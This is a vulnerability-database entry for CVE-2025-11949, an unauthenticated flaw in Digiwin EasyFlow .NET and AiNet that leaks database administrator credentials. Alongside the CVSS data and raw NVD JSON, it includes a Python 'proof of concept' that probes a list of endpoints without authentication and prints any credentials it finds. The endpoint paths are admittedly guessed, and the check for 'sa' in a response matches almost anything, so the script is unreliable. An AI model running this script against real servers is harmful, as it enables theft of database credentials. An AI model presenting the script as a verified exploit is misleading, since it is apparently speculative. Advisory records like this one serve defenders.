Security Vulnerability Report
中文
CVE-2025-11949 CVSS 7.5 HIGH

CVE-2025-11949

Published: 2025-10-21 07:15:35
Last Modified: 2026-04-15 00:35:42

Description

EasyFlow .NET and EasyFlow AiNet, developed by Digiwin, has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to obtain database administrator credentials via a specific functionality.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Digiwin EasyFlow .NET (所有已知受影响版本)
Digiwin EasyFlow AiNet (所有已知受影响版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11949 - Digiwin EasyFlow Missing Authentication PoC # This PoC demonstrates how an unauthenticated attacker can obtain # database administrator credentials from vulnerable EasyFlow endpoints. import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-easyflow.example.com" # Common vulnerable endpoints in EasyFlow that may expose DB credentials VULNERABLE_PATHS = [ "/EasyFlow/Setup/DatabaseConfig", "/EasyFlow/Admin/DBInfo", "/EasyFlow/Net/Setup/GetDBConn", "/AiNet/Setup/DatabaseConfig", "/WebAPI/Database/ConnectionInfo", "/Eflow/Admin/GetDBCredentials" ] def exploit_missing_auth(base_url): """ Attempt to retrieve DB admin credentials from unauthenticated endpoints. """ print(f"[*] Targeting: {base_url}") for path in VULNERABLE_PATHS: url = f"{base_url.rstrip('/')}{path}" try: # No authentication headers or cookies required resp = requests.get(url, timeout=10, verify=False) if resp.status_code == 200 and ("password" in resp.text.lower() or "sa" in resp.text.lower()): print(f"[+] Vulnerable endpoint found: {url}") print(f"[+] Response:\n{resp.text}") return resp.text except requests.exceptions.RequestException as e: continue print("[-] No vulnerable endpoint detected or endpoint path differs.") return None if __name__ == "__main__": credentials = exploit_missing_auth(TARGET_URL) if credentials: print("\n[!] Database admin credentials obtained! Secure your system immediately.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11949", "sourceIdentifier": "[email protected]", "published": "2025-10-21T07:15:35.337", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EasyFlow .NET and EasyFlow AiNet, developed by Digiwin, has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to obtain database administrator credentials via a specific functionality."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10455-5b9ac-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10454-35844-1.html", "source": "[email protected]"}]}}